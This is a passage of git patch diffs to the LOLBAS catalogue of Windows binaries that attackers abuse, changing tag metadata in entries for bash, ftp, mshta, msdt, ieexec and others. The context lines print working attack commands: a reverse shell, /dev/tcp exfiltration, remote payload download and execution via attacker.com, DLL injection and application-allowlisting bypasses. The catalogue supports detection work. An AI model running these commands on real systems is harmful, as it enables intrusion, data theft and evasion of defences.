Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 87076e3b..e7d9b930 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures 
@@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 8da75b12..b6204bf0 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -28,7 +28,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index c89260d1..e9ce1bd5 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary 
@@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 13b34e44..a96fe54f 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: From e07907c473442199d60d4e6a73c7a63cef3f00d8 Mon Sep 17 00:00:00 2001 
From: Hegusung Date: Sun, 13 Oct 2024 18:01:58 +0200 Subject: [PATCH 076/148] Removed Fixed and Custom Format tags --- yml/OSBinaries/Addinutil.yml | 1 - yml/OSBinaries/At.yml | 1 - yml/OSBinaries/Atbroker.yml | 1 - yml/OSBinaries/Bash.yml | 4 ---- yml/OSBinaries/Certoc.yml | 1 - yml/OSBinaries/Cmstp.yml | 2 -- yml/OSBinaries/Conhost.yml | 2 -- yml/OSBinaries/Control.yml | 2 -- yml/OSBinaries/Cscript.yml | 1 - yml/OSBinaries/CustomShellHost.yml | 1 - yml/OSBinaries/Dfsvc.yml | 1 - yml/OSBinaries/Diskshadow.yml | 2 -- yml/OSBinaries/Dnscmd.yml | 1 - yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Explorer.yml | 2 -- yml/OSBinaries/Extexport.yml | 1 - yml/OSBinaries/Forfiles.yml | 2 -- yml/OSBinaries/Fsutil.yml | 1 - yml/OSBinaries/Ftp.yml | 1 - yml/OSBinaries/Gpscript.yml | 2 -- yml/OSBinaries/Hh.yml | 2 -- yml/OSBinaries/Ie4uinit.yml | 1 - yml/OSBinaries/Iediagcmd.yml | 1 - yml/OSBinaries/Ieexec.yml | 2 -- yml/OSBinaries/Infdefaultinstall.yml | 1 - yml/OSBinaries/Installutil.yml | 2 -- yml/OSBinaries/Mavinject.yml | 2 -- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 3 --- yml/OSBinaries/Mmc.yml | 1 - yml/OSBinaries/Msbuild.yml | 5 ----- yml/OSBinaries/Msconfig.yml | 1 - yml/OSBinaries/Msdt.yml | 3 --- yml/OSBinaries/Msedge.yml | 1 - yml/OSBinaries/Mshta.yml | 1 - yml/OSBinaries/Msiexec.yml | 5 ----- 35 files changed, 61 deletions(-) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7f188467..7ff31457 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjets - - Input: Fixed Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 2c1c1ed7..12397727 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7 or older Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 99c1efbc..d8f50647 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 87d29639..ec33fe02 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 1698354f..34b5c3f5 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 3a91d247..bccde852 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index c0b49723..3dca837f 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: 
diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a9b8c99d..a4864587 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 3f9d3527..129672d6 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 16dd0b06..7390b356 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index c52a3a6f..ab8ca266 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: ClickOnce - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe 
diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index a3ddba27..c54501fa 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index f4db3af5..613ce761 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1f..378d7c28 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index f4885348..1c0e2ff3 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 076343aa..c75e30a1 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 8b771963..a2368721 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream 
@@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 5714d372..e4b38ed1 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 21ea0a6f..6b4828bf 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 0a5b355c..3ac6adcb 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe 
diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index bc55c986..e861cd2b 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -20,7 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe @@ -32,7 +31,6 @@ Commands: - Execute: CMD - Execute: CHM - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ae5dd4a9..80c6cc52 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 9d5ddcc6..056e30ee 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 43ba954d..3b659dd0 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location 
@@ -25,7 +24,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 9d8c607c..d0f129a8 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index a5868cab..8a070107 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -25,7 +24,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index f89afc01..33e2aa7c 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index a711f8e6..5d76acaf 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,7 +24,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -36,7 +34,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 0eb4ee99..7cbe41ac 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml 
@@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 80a2fa57..da29e92c 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters 
@@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -53,7 +49,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 54ba0b5e..f8c829ef 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1b9649eb..e6811049 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting 
@@ -25,7 +24,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -36,7 +34,6 @@ Commands: Tags: - Application: GUI - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 96d6f820..d0cc16d4 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index a3d4fdea..355b5470 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index f58f0277..92390c16 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml 
